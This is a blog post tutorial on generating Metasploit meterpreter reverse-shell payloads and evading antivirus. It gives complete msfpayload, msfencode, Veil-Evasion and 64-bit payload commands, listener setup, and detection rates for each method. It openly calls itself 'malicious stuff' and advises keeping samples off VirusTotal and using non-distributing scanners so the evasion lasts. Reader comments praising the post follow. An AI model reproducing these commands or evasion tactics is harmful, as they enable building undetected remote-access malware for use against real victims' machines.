Generating Payloads & Anti-Virus Bypass Methods

Posted on Updated on

Hi everyone… This article aboot is malicious stuff. How we can create payload? How we can connect & listen other’s pc… Yeap,they are all possible with Metasploit or other similar tools. Also; it’s safe for you. You don’t need to use any stealer,keylogger,crypter… Metasploit already has all of it 😉
Follow my steps…

My test machine is ; Windows 7 on the Virtual Machine & Windows 8
Local host ip : 10.34.0.62 (Backtrack 5 R3)
Local port : 4444

You can start with msfconsole or you can directly call meterpreter…


Method 1: No Encode – Just Payload    [ AV Detect Ratio = %74 ]

/opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.34.0.62 LPORT=4444 x > /root/Desktop/payload_1.exe

py_1Or;

msfconsole
msfpayload windows/meterpreter/reverse_tcp LHOST=10.34.0.62 LPORT=4444 x > /root/Desktop/payload_1.exe

v2_

Doesn’t matter…Both the same. After generating the payload;
We should start listening network with multi/handler for any packet that comes in… Here is the Listen Mode settings;

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.34.0.62
set LPORT 4444
exploit

or;

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=10.34.0.62 LPORT=4444 E

py_2

After running …

testYes! We are in 😉
This method is highly untrusted & detectable by AV.
Here is the Virus Total scanning result ;
http://goo.gl/ql9qmp

vt_1


Method 2: Encoding with Msfencode   [ AV Detect Ratio = %74 ]

Metasploit already have encoders. You can see all of them with this command;

msfconsole
show encoders

-encdrs

I use yellow ones 🙂

msfpayload windows/meterpreter/reverse_tcp LHOST=10.34.0.62 LPORT=4444 R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -e x86/shikata_ga_nai -c 2 > /root/Desktop/payload_2.exe

py_2_

After running on the test machine;

v2_w

And we are in…
This method is generally untrusted & detectable by AV.
Here is the Virus Total scanning result ;
http://goo.gl/pB4Zaq

sonuc2


Method 3: Encoding with Veil-Framework   [ AV Detect Ratio = %0  ]

Veil-Evasion is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
Setup & Source: https://github.com/Veil-Framework/Veil-Evasion

Run;

python Veil-Evasion.py

veil_

My payload’s settings;

list
20
set LHOST 10.34.0.62
set LPORT 4444
set compile_to_exe Y
set use_pyherion Y
generate

myOp_veilAfter;

vll2Now we can listen with multi/handler… And, after the running;

veil_o

Veil-Framework generates powerfull payloads. Therefore, don’t submit samples to any online scanners, like VirusTotal
My preffer is ; razorscanner.comfuckingscan.me . They do not distribute any files.
Here is the scanning result ;
http://goo.gl/t5Np3H

a


Method 4: Generate 64 bit payload   [ AV Detect Ratio = %3 or less ]

msfconsole
use payload/windows/x64/meterpreter/reverse_tcp
set LHOST 10.34.0.62
set LPORT 4444
set EXITFUNC process
generate -t exe -f /root/Desktop/payload_4_64bit.exe

64lük

Testing on my machine/Windows 8-64 bit 🙂 …Firstly open the listen mode & wait;

64lük_çalış

Here is the Virscan scanning result ;
http://goo.gl/ETgkQI

ase


Thank you d3nx for helping & inspiring.
Have a good hacks 🙂

Advertisements

4 thoughts on “Generating Payloads & Anti-Virus Bypass Methods

    Somebody said:
    25 March 2014 at 13:46

    thx bro,nice article.

    MBE Jr said:
    11 April 2014 at 15:24

    ibretlik paylaşım.

    Coral said:
    18 April 2014 at 21:25

    Epic! This has my thumbs up for best 2014 post

    luke bryan tickets 2013 said:
    05 May 2014 at 09:05

    Hello from Usa! This was a terrific post and
    I appreciated reading it

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s